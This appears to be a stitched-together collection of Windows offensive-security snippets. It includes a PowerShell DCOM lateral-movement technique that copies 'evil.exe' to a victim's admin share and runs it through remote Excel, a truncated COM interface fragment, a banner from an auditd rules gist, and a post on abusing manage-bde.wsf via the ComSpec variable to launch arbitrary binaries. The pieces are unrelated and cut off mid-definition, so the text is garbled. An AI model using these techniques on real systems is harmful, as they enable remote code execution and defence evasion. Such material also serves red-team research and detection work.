```powershell
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111"))
# Windows 10 specific, but searches PATH so ..
copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
$excel.ActivateMicrosoftApp("5")
# excel executes your binary :)
```
```c
typedef interface IFwCplLua IFwCplLua;
typedef struct IFwCplLuaInterfaceVtbl {
    BEGIN_INTERFACE
    HRESULT(STDMETHODCALLTYPE *QueryInterface)(
        __RPC__in IFwCplLua * This,
        __RPC__in REFIID riid,
        _COM_Outptr_ void **ppvObject);
```
```
# IMPORTANT!
# This gist has been transformed into a github repo
# You can find the most recent version there:
# https://github.com/Neo23x0/auditd
#      ___             ___ __      __
#     /   | __  ______/ (_) /_____/ /
#    / /| |/ / / / __  / / __/ __  /
#   / ___ / /_/ / /_/ / / /_/ /_/ /
#  /_/  |_\__,_/\__,_/_/\__/\__,_/
```
I came across an interesting Windows Script File (WSF) that has been around a while called 'manage-bde.wsf'. It may be located in SYSTEM32.

Though not nearly as cool as SyncAppvPublishingServer[.com/.vbs], we can 'tamper' with manage-bde.wsf to run things in unattended ways.

Here are a few examples that you may or may not find useful -

1) Replace ComSpec Variable

```bat
set comspec=c:\windows\system32\calc.exe
cscript manage-bde.wsf
```